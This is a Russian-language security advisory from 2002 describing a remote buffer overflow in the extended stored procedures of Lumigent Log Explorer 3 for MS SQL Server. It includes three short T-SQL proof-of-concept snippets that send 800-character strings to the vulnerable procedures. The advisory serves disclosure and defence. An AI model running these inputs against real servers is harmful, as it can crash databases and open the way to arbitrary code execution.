Переполнение буфера в Lumigent Log Explorer

Дата публикации:
20.06.2002
Всего просмотров:
1086
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Lumigent Log Explorer - эксплорер журнала транзакций для Microsoft SQL Server 7/2000. Программа поставляется с дополнительными сохраненными процедурами, хранящимися в p_logattach.dll. Некоторые их этих процедур уязвимы к удаленному переполнению буфера и потенциально к выполнению произвольного кода.

Пример:

declare @bo varchar(8000) 
set @bo = replicate('A', 800) 
exec xp_logattach_StartProf @bo 

declare @bo varchar(8000) 
set @bo = replicate('A',800) 
exec xp_logattach_setport @bo 

declare @bo varchar(8000) 
set @bo = replicate('A',800) 
exec xp_logattach @bo
Уязвимость обнаружена в Lumigent Log Explorer version 3

Ссылки: Lumigent Log Explorer Extended Stored Procedures Buffer Overflow
или введите имя

CAPTCHA